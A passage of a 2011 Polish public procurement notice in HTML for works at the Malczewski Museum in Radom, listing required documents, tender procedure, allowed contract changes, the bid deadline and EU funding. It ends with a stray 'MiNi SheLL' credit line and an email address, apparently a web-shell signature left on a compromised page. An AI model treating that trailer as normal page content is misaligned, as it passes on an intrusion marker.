<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oferta (wzór) Załącznik  Nr 1 do SIWZ. Wymagana forma dokumentu: oryginał.  2. Kosztorys ofertowy . Wymagana forma dokumentu: oryginał. 3.  Dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian umowy (zgodnie z art. 144 ust. 1 ustawy pzp).  polegających na:
1) zmianie rozwiązań technicznych w dokumentacji projektowej wykonania zamówienia:  
a) na wniosek Wykonawcy, za zgodą Zamawiającego w trakcie prowadzenia robót, mogą być dokonywane zmiany technologii wykonywania elementów prac; dopuszcza się je tylko w przypadku gdy, proponowane przez niego rozwiązanie jest równorzędne lub lepsze funkcjonalnie od tego, jakie przewiduje projekt, a Wykonawca nie będzie żądał zwiększenia wynagrodzenia za wykonywane roboty; w tym przypadku Wykonawca przedstawia projekt zamienny zawierający opis proponowanych zmian wraz z rysunkami; projekt wymaga zatwierdzenia przez projektanta, uzgodnienia z inspektorem nadzoru i akceptacji Zamawiającego oraz Wojewódzkiego Konserwatora Zabytków ; powyższe zmiany nie mogą zmieniać terminu zakończenia robót,
b) w uzasadnionych przypadkach, gdy realizacja zadania według dokumentacji technicznej i specyfikacji technicznej wykonania i odbioru robót powodowałoby wadliwe wykonanie przedmiotu umowy dopuszcza się wprowadzenie zmian w stosunku do dokumentacji projektowej bez zmiany terminu zakończenia robót,
c) w przypadku, gdy z punktu widzenia Zamawiającego zachodzi potrzeba wprowadzenia zmiany rozwiązań technicznych nie przewidzianych w umowie, sporządza on protokół konieczności, a następnie dostarcza dokumentację projektową na te roboty; zmiany     techniczne  mogą powodować zmianę  terminu zakończenia zamówienia podstawowego. 
2) zmianie terminu zakończenia zamówienia podstawowego:
a)spowodowanej warunkami geologicznymi, wystąpieniem wykopalisk i odkryć archeologicznych oraz o znaczeniu  historycznym, bądź wystąpieniem niewybuchów, niewypałów uniemożliwiających prowadzenie robót; wszystkie przedmioty o znaczeniu historycznym lub też przedstawiające znaczną wartość odkryte na terenie budowy, będą przekazane pod opiekę konserwatora zabytków; Wykonawca niezwłocznie zabezpieczy znaleziska przed osobami trzecimi; Wykonawca niezwłocznie powiadomi inspektora nadzoru o takich odkryciach i wykona jego polecenia, co do obchodzenia się z nimi i dalszego trybu postępowania.
3) zmianie dotyczącej zakresu robót , jeżeli wystąpią: 
- nieprzewidziane kolizje z pracami prowadzonymi równolegle przez inne podmioty;w takim przypadku zmiany w umowie zostaną ograniczone do zmian powodujących uniknięcie lub usunięcie kolizji jak: zmiana sposobu wykonania, materiałów, technologii, lokalizacji wbudowywanych urządzeń oraz zmiana terminu ;
- okoliczności powodujące zmniejszenie zakresu przedmiotu zamówienia; w przypadku zmniejszenia zakresu przedmiotu zamówienia przez Zamawiającego, wynagrodzenie należne Wykonawcy za wykonane roboty pozostaje w takim stosunku do  wynagrodzenia, w jakim wykonane prace pozostają do całości robót określonych umową; 
4) zmianie osobowej: zmiana osób przy pomocy, których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w SIWZ lub zmiana - za zgodą Zamawiającego, podwykonawców nie wskazanych w ofercie (lub zakresu wskazanego w ofercie jako planowany do powierzenia podwykonawcom); zmiana taka nie wymaga aneksu do umowy i może być przeprowadzona przy zachowaniu procedury zatwierdzenia podwykonawców wynikającej z przepisów prawa i SIWZ,
5) zmianie warunków płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych Instytucji Zarządzającej dotyczących realizacji projektu,
6)zmianie spowodowanej wystąpieniem siły wyższej, czyli zdarzenia, którego Strony nie mogły przewidzieć i któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwią Wykonawcy wykonanie w części lub całości jego zobowiązań; jeżeli wykonanie umowy jest niemożliwe z powodu siły wyższej to inspektor nadzoru zaświadczy, że wykonanie umowy jest niemożliwe; Wykonawca zabezpieczy teren inwestycji tak szybko jak jest to możliwe i wstrzyma prace, a Zamawiający zapłaci wynagrodzenie za wykonane roboty; 
7) Zamawiający dopuszcza zmianę ceny zamówienia brutto (ceny ofertowej) w przypadku urzędowej zmiany stawki podatku VAT. Stawka podatku VAT określana jest zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2004 r. Nr 54 poz. 535, z późn. zm.).
8) Zamawiający dopuszcza zmianę umowy w formie aneksu, jeżeli zajdzie potrzeba w sytuacji zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie 
dostosowanie treści umowy do aktualnego stanu prawnego. Zmiana ta może
spowodować wydłużenie terminu wykonania prac i nie spowoduje zmiany
wynagrodzenia Wykonawcy Inicjatorem tej zmiany może być zamawiający lub 
wykonawca.
9) Zamawiający dopuszcza zmianę umowy w formie aneksu, w sytuacji rezygnacji 
z wykonania części prac. Zmiana ta może spowodować  wydłużenie terminu  
wykonania  prac i nie spowoduje zmiany wynagrodzenia Wykonawcy. Inicjatorem tej zmiany może  być Zamawiający.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.muzeum.edu.pl-Zamówienia Publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Muzeum im. J. Malczewskiego w Radomiu, Rynek 11 26-600 Radom pok. 211  od poniedziałku do piątku w godz. 8.00 - 15.00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2011 godzina 10:00, miejsce: W siedzibie Zamawiającego, pokój nr: 213a  Muzeum im. J. Malczewskiego, Rynek 11, 26-600 Radom..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany jest z Europejskiego Funduszu Rozwoju Regionalnego w ramach Priorytetu VI Wykorzystanie walorów naturalnych i kulturowych dla rozwoju turystyki i rekreacji. Działania 6.1 KULTURA Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com